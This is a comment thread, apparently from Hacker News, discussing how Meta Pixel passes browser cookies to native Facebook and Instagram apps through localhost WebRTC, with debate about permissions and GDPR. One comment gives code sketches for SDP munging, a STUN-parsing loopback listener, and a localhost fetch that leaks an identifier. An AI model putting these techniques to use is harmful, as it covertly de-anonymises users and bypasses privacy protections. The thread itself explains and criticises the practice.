Comment by merek
5 days ago
This is the overall process used by Meta as I understand it, taken from https://localmess.github.io/:
1. User is logged into the FB or IG app. The app runs in the background and listens for incoming traffic on specific ports.
2. User visits a website in the phone's browser, say something-embarrassing.com, which happens to have the Meta Pixel embedded. According to the article, the Meta Pixel is embedded on over 5.8 million websites. Even in Incognito mode, the user will still get tracked.
3. The website might ask for the user's consent, depending on location. The article doesn't elaborate; presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools (see the sketch after this list).
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays the _fbp value and the user's ID to Meta's servers.
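To make step 4 concrete, here is a minimal browser-side sketch of what SDP munging can look like. To be clear, this is my own illustration, not Meta's actual code: carrying the value in the ICE ufrag and hex-encoding it are assumptions on my part, and a real exploit also has to steer the ICE traffic at the local ports the apps listen on.

```typescript
// A minimal sketch of browser-side SDP munging, assuming the identifier is
// smuggled inside the ICE ufrag. Field choice and hex encoding are my
// assumptions for illustration, not taken from the Meta Pixel script itself.
async function smuggleViaSdpMunging(fbpValue: string): Promise<void> {
  const pc = new RTCPeerConnection();
  pc.createDataChannel("c"); // gives the offer a media section so ICE runs

  const offer = await pc.createOffer();

  // ice-ufrag only allows a restricted character set, so hex-encode the value.
  const payload = Array.from(new TextEncoder().encode(fbpValue))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");

  // The "munging": rewrite the SDP string before handing it back to the browser.
  const mungedSdp = (offer.sdp ?? "").replace(
    /a=ice-ufrag:.*/g,
    `a=ice-ufrag:${payload}`
  );
  await pc.setLocalDescription({ type: "offer", sdp: mungedSdp });

  // A real exploit would presumably also supply remote candidates pointing at
  // fixed loopback ports, so the ICE connectivity checks (STUN binding
  // requests) carrying this ufrag reach the listening app. None of that
  // traffic appears in the browser's network log.
  console.log(pc.localDescription?.sdp.match(/a=ice-ufrag:.*/)?.[0]);
}
```

Per the article's note quoted below, Chrome developers have announced they will disable exactly this kind of munging.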
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
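On the apps "actively listening" on local ports: conceptually the receiving side only needs a UDP socket bound to a known loopback port plus a small STUN parser to recover the smuggled value from the ICE username. A rough Node/TypeScript sketch of what such a listener could look like (the port number and parsing details are my guesses, not taken from the write-up):

```typescript
// Rough sketch of the receiving side: a UDP listener on a loopback port that
// pulls the USERNAME attribute out of incoming STUN binding requests.
// Runs under Node; the port number and parsing details are illustrative.
import { createSocket } from "node:dgram";

const STUN_MAGIC_COOKIE = 0x2112a442;
const ATTR_USERNAME = 0x0006;

// STUN messages have a 20-byte header followed by TLV attributes padded to
// 4-byte boundaries; USERNAME carries "remote-ufrag:local-ufrag".
function extractStunUsername(msg: Buffer): string | null {
  if (msg.length < 20 || msg.readUInt32BE(4) !== STUN_MAGIC_COOKIE) return null;
  let offset = 20;
  while (offset + 4 <= msg.length) {
    const type = msg.readUInt16BE(offset);
    const len = msg.readUInt16BE(offset + 2);
    if (type === ATTR_USERNAME) {
      return msg.toString("utf8", offset + 4, offset + 4 + len);
    }
    offset += 4 + len + ((4 - (len % 4)) % 4); // skip value plus padding
  }
  return null;
}

const socket = createSocket("udp4");
socket.on("message", (msg) => {
  const username = extractStunUsername(msg);
  if (username) {
    // With a munged offer, the smuggled identifier sits in the ufrag half;
    // a real app could now tie it to the logged-in account and phone home.
    console.log("ICE username seen on loopback:", username);
  }
});
socket.bind(12345, "127.0.0.1"); // placeholder port, not from the article
```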
> something-embarrassing.com,
Depending on the country that you or your family lives in, this could be far worse than embarrassment.
So the main application for WebRTC is de-anonymisation of users (for example, getting their local IP address). Why it is not hidden behind a permission, I don't understand.
The main application for WebRTC is peer to peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
Let it show "Use WebRTC?".
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always aim for users a little more knowledgeable than you think they are.
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
You could use similar language for WebRTC.
TFA lists tens of thousands of websites using WebRTC for deanonymization. How many websites using it for P2P data transfer can you list?
What about "This website would like to connect to the Instagram App and may share your browsing history and other personal details."
The website wants to connect to another computer|another app on your computer.
Most users probably will click "No" and this is a good choice.
> The main application for WebRTC is peer to peer data transfer.
But not for the user.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
You mean just like a million other "user-positive" browser features pushed by the biggest tracking company there is.
Because the decision makers don't care about privacy; they only want you to think that you have privacy, thus enabling even more spying. One solution is to not use the apps and websites from companies that are known to abuse WebRTC or other such features.
This is not unique to WebRTC. The same result could be achieved by sending an HTTP request to localhost. The only difference in this case is that with WebRTC no HTTP request gets logged.
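For comparison, a hedged sketch of what that localhost request could look like from a page script (the port, path and request details are made up for illustration):

```typescript
// Sketch of the localhost-HTTP variant: a page script posts an identifier to
// a port where a native app is assumed to be listening. Port and path are
// made up; "no-cors" lets the request go out even though the response stays
// opaque to the page.
async function leakViaLocalhostHttp(fbpValue: string): Promise<void> {
  try {
    await fetch("http://localhost:12345/collect", {
      method: "POST",
      mode: "no-cors",
      body: fbpValue,
    });
  } catch {
    // No listener on that port, or the browser refused the local connection.
  }
}
```

Unlike the WebRTC path, a request like this does at least show up in the browser's network log.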
The browser could refuse to connect to localhost. I think there are browsers that refuse (e.g., to prevent attacks on a router's config interface).
> 1. User is logged into the FB or IG app. The app runs in the background and listens for incoming traffic on specific ports.
I happen to be immune; I disabled Background App Refresh in iOS settings. All app notifications still work, except WhatsApp :(
https://forums.macrumors.com/threads/any-reason-to-use-backg...
> except whatsapp
> company checks out
> User is logged into the FB or IG app. The app runs in the background
So a takeaway is to avoid having Facebook or Instagram apps on your phone. I'm happy to continue to not have them.
Any others? e.g. WhatsApp. Sadly, I find this one a necessary communication tool for family and business in certain countries.
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is First Party, which means you’ve consented to permitting only that party to track you using it, and not permitting its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first-party cookies, from all parties, and the OP's implication is (I think) that now these non-correlatable-by-consent first-party cookies can be or are being used to track you across all sites that use them.
Not only did you only consent to the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect to the Facebook or Instagram app on your device and associate visits to this website with your Meta account. Yes/No (with "No" selected as the default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
Which, on the face of it, sounds like a violation of the GDPR...
The intent of these laws is just so obtuse and unclear! And beyond that, complying is technically impossible to implement, but you could only understand that if you were a rocket-scientist PhD computer-science whizkid making $$$$k in California, which isn't that much in such a high-cost-of-living area, donchaknow. /sardonic
> abusing mandated GDPR cookie notices to secretly track people?
How does that even work? What can GDPR cookie notices do that the typical tracker can't?
The cookie preference pop-up itself relies on a cookie. To track your preference, they need a cookie. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass is reached to get cases in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Also, ad blocking via AdAway would do the trick here, I assume, as it should block Meta Pixel tracking. Overall, an awful approach.